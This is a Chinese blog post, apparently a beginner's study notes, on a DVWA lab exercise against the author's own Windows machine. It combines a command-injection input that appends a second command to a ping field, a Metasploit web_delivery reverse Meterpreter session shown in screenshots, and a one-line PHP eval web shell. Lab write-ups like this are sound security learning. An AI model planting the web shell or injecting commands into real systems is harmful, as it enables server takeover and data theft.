学习记录:通过MSF利用Web代码注入渗透服务器

本文是一个新手的学习记录,通过DVWA平台,利用Metasploit(MSF)框架对Web代码注入漏洞进行渗透测试。作者在Windows靶机上发现Python环境,生成MSF的反向连接代码,成功获取Meterpreter会话,但由于权限限制未能进一步提权。此外,还介绍了上传WebShell(一句话木马)的方法,以及由此带来的系统风险。
摘要由CSDN通过智能技术生成

_> 写在最前

小白第一次写学习记录,文中不足之处还请多多见谅。

1. 环境介绍

  • 靶机: Windows 10 专业版 22H2
  • 攻击机:Kali
  • 网站软件:PhpStudy
  • 靶场:DVWA
    就不演示搭建过程了(主要是懒)。

2.测试网页介绍

本次测试的网页如下:
Alt
难度等级:Low
主要是学习怎么用代码注入和MSF的结合去控制主机(当然用WebShell去连接更简单)

  • 首先分析此页面使用的是命令拼接的方式来实现功能的,所以我在正常的Ping xxx 后面又加上了 “&” ,由此尝试可不可以执行别的命令,结果如上图。
//  输入的语句
baidu.com & python --version

点击Submit, 发现返回了Python的版本号!

3.游戏开始

可以得出,服务器上是安装了Python的,我电脑确实是如此。
在这里插入图片描述

既然都那么痛快了,就利用MSF来生成反向连接代码吧!

4.使用MSF生成注入代码

打开Kali虚拟机
启动MSF
在这里插入图片描述
搜索 Exploit 模块中的 web_Delivery

在这里插入图片描述

使用该模块,设置基本参数
在这里插入图片描述
查询本机ip地址并填入
在这里插入图片描述
确认生成为Python代码
在这里插入图片描述
关键时刻!!!! 创建监听,然后提交代码
在这里插入图片描述
网页一直在加载,回到Kali这边 目标已上线!
在这里插入图片描述
成功获取到Meterpreter,但却是python/windows会话,查看sysinfo
python类型的Meterpreter对话功能较少,本地尝试提权失败,只能考虑用这个会话再上传免杀木马了,但现在的免杀基本上刚发出来没几天就可能寄掉,鄙人新人一枚,无奈实验到此结束

(其实是因为某白痴费劲心思做的免杀却被无情干掉的痛`(>﹏<)′)静态可免杀,动态就被火绒干掉了,等以后再好好学免杀。)
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

5.但是!

但还可以上传 一句话木马 来救一救的嘛,无所谓了挣扎一下,早点去刷B站ヾ(≧▽≦)o*

<?php eval($_POST['jntm']); ?>

把webshell.php就藏再站点目录里,然后用蚁剑连接一波
在这里插入图片描述
就挺突然的,我整个电脑的硬盘都已经暴露了,可以一览无余

6.总结

本次学习记录就到此结束了,本人实在是没入门的小白,不过每天学习,每天进步,加油!
挺喜欢Kali的新壁纸的,上面写着一句话:

“The quieter you become, the more you are able to hear”

免责声明:本文仅作学习、深研而用,若有犯罪行为,一切后果自负,与本文作者无关。

  • 17
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值